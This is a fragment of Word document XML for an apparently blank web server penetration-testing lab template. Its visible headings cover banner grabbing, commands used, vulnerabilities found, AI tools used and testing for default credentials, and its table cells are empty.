                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Perform Banner Grabbing to Identify the Target Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CB32A7C" w14:textId="77777777" w:rsidR="00126377" w:rsidRPr="009B156D" w:rsidRDefault="00126377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45"/>
        <w:gridCol w:w="6615"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC267D" w:rsidRPr="00DC267D" w14:paraId="716D885E" w14:textId="77777777" w:rsidTr="000D097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642A0C9A" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="000D097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C267D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615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C325181" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00DC26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C267D" w:rsidRPr="00DC267D" w14:paraId="216911CE" w14:textId="77777777" w:rsidTr="000D097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12157B6F" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="000D097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C267D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615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D2CF969" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00DC26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C267D" w:rsidRPr="00DC267D" w14:paraId="17A3D4FA" w14:textId="77777777" w:rsidTr="000D097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56DCCB73" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="000D097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C267D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615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F75DCC8" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00DC26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C267D" w:rsidRPr="00DC267D" w14:paraId="7B9492CD" w14:textId="77777777" w:rsidTr="000D097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032E3917" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="000D097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C267D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Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F50D8A9" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00DC26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C267D" w:rsidRPr="00DC267D" w14:paraId="74BE2031" w14:textId="77777777" w:rsidTr="000D097B">
        <w:trPr>
          <w:trHeight w:val="1502"/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0DD0B74A" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="000D097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C267D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B144C41" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00DC26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C267D" w:rsidRPr="00DC267D" w14:paraId="3F1938A0" w14:textId="77777777" w:rsidTr="000D097B">
        <w:trPr>
          <w:trHeight w:val="1412"/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3CE5FC0D" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="000D097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C267D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Identified Make, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC267D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:br/>
              <w:t>Model and Version of the Web Server Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E034920" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00DC26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C267D" w:rsidRPr="00DC267D" w14:paraId="01A7890F" w14:textId="77777777" w:rsidTr="000D097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459E3076" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="000D097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C267D"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 Vulnerabilities and Exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B5ECA4" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00843567">
            <w:pPr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E443E3F" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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B14DB97" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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A390E7D" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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9EDBB10" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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02E0CA3" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00DC26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C267D" w:rsidRPr="00DC267D" w14:paraId="334597F8" w14:textId="77777777" w:rsidTr="000D097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1341AEA3" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="000D097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C267D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615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D56F2E" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00843567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C170D34" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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B626765" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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9256FED" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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C438F98" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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6E89269" w14:textId="77777777" w:rsidR="00DC267D" w:rsidRPr="00DC267D" w:rsidRDefault="00DC267D" w:rsidP="00DC26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E7BB6" w:rsidRPr="00DC267D" w14:paraId="278245AB" w14:textId="77777777" w:rsidTr="000D097B">
        <w:trPr>
          <w:trHeight w:val="1313"/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0F240AC3" w14:textId="170E01BF" w:rsidR="006E7BB6" w:rsidRPr="00DC267D" w:rsidRDefault="006E7BB6" w:rsidP="000D097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A7B6B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AI Tools Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F65AC32" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="006E7BB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C030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[*ShellGPT, Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A8BA94B" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="006E7BB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4BD9176" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRPr="00DC267D" w:rsidRDefault="006E7BB6" w:rsidP="006E7BB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E7BB6" w:rsidRPr="00DC267D" w14:paraId="24C3674D" w14:textId="77777777" w:rsidTr="000D097B">
        <w:trPr>
          <w:trHeight w:val="1430"/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7971941D" w14:textId="775EC43E" w:rsidR="006E7BB6" w:rsidRPr="00BA7B6B" w:rsidRDefault="006E7BB6" w:rsidP="000D097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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="099B8579" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="006E7BB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E5C2BAE" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="006E7BB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54C220F" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRPr="002C030C" w:rsidRDefault="006E7BB6" w:rsidP="006E7BB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E7BB6" w:rsidRPr="00DC267D" w14:paraId="0F4D5938" w14:textId="77777777" w:rsidTr="000D097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045BA1F7" w14:textId="256483E6" w:rsidR="006E7BB6" w:rsidRPr="004B6A7F" w:rsidRDefault="006E7BB6" w:rsidP="000D097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3422B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 xml:space="preserve">Extracted Information </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C24DE22" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="006E7BB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D6A6E15" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="006E7BB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A613C26" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="006E7BB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</w:tbl>
    <w:p w14:paraId="23D9C25C" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRPr="00A51A96" w:rsidRDefault="006E7BB6" w:rsidP="006E7BB6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7BB6" w14:paraId="1CEE7CFC" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="740202BC" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C2FD2CC" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21B69030" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73C63E20" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="174A56C6" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19EFBB3B" w14:textId="77777777" w:rsidR="006E7BB6" w:rsidRDefault="006E7BB6" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79356ECD" w14:textId="77777777" w:rsidR="00FC0929" w:rsidRDefault="00FC0929" w:rsidP="000947B4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F83691" w:rsidRPr="000F3EF2" w14:paraId="37458B7D" w14:textId="77777777" w:rsidTr="009D5D7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="145C62C3" w14:textId="41A81B01" w:rsidR="00F83691" w:rsidRPr="000F3EF2" w:rsidRDefault="00F83691" w:rsidP="008519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1.17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5B0B5A" w:rsidRPr="005B0B5A">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Test for Default Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30A34482" w14:textId="77777777" w:rsidR="00AA7FF2" w:rsidRPr="00E205BF" w:rsidRDefault="00AA7FF2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631"/>
        <w:gridCol w:w="3370"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A61C63" w:rsidRPr="00A61C63" w14:paraId="7B28BA46" w14:textId="77777777" w:rsidTr="00E205B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26206A1" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00E205B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61C63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1" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15A5227C" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C6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61C63" w:rsidRPr="00A61C63" w14:paraId="4EE5485D" w14:textId="77777777" w:rsidTr="00E205B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47EF75A" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00E205B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61C63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1" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E4357F" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C6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61C63" w:rsidRPr="00A61C63" w14:paraId="3A556372" w14:textId="77777777" w:rsidTr="00E205BF">
        <w:trPr>
          <w:trHeight w:val="917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D16021C" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00E205B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61C63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1" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="605BBC58" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C6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61C63" w:rsidRPr="00A61C63" w14:paraId="6ABFA59F" w14:textId="77777777" w:rsidTr="00E205B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8D4E055" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00E205B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61C63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Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7001" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B180797" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C6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9AF0781" w14:textId="77777777" w:rsidR="008D2BAC" w:rsidRPr="00A61C63" w:rsidRDefault="008D2BAC" w:rsidP="00A61C6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61C63" w:rsidRPr="00A61C63" w14:paraId="5F8FEDC7" w14:textId="77777777" w:rsidTr="00E205BF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541A2B9" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00E205B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61C63">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Located Overtly Accessible Web Servers with Administrative Interfaces that Run on Different Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7001" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="520C6481" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567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07885C6" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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AB0DFC2" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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E8505B9" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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039416D" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C6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61C63" w:rsidRPr="00A61C63" w14:paraId="6FA0D227" w14:textId="77777777" w:rsidTr="00A61C63">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9355" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2FA1DCD0" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C6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A61C63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Default Credentials of </w:t>
            </w:r>
            <w:r w:rsidRPr="00A61C63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Web Servers</w:t>
            </w:r>
            <w:r w:rsidRPr="00A61C63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and </w:t>
            </w:r>
            <w:r w:rsidRPr="00A61C63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Network Devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A61C63" w:rsidRPr="00A61C63" w14:paraId="2E816DCF" w14:textId="77777777" w:rsidTr="0085194C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07AB2406" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A7767C" w:rsidRDefault="00A61C63" w:rsidP="00A61C6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A7767C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Device Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3631" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B91A56A" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A7767C" w:rsidRDefault="00A61C63" w:rsidP="00A61C6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A7767C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Usernames</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3370" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D83A5EE" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A7767C" w:rsidRDefault="00A61C63" w:rsidP="00A61C6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A7767C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Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A61C63" w:rsidRPr="00A61C63" w14:paraId="1F82ECAA" w14:textId="77777777" w:rsidTr="0085194C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="365E6994" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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3631" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F052243" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C63">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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3370" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="630059D3" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C63">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="560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</w:tr>
      <w:tr w:rsidR="00A61C63" w:rsidRPr="00A61C63" w14:paraId="7EEC9DEF" w14:textId="77777777" w:rsidTr="0085194C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CBDF6A4" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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3631" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EABFD52" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C63">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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3370" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4722037D" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C63">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="560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</w:tr>
      <w:tr w:rsidR="00A61C63" w:rsidRPr="00A61C63" w14:paraId="1D20695D" w14:textId="77777777" w:rsidTr="0085194C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5673DD9F" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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3631" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="360A0A15" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C63">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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3370" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A31A1FE" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C63">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="560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</w:tr>
      <w:tr w:rsidR="00A61C63" w:rsidRPr="00A61C63" w14:paraId="62414550" w14:textId="77777777" w:rsidTr="0085194C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F76D153" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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3631" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C49545E" w14:textId="77777777" w:rsidR="00A61C63" w:rsidRPr="00A61C63" w:rsidRDefault="00A61C63" w:rsidP="00A61C63">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
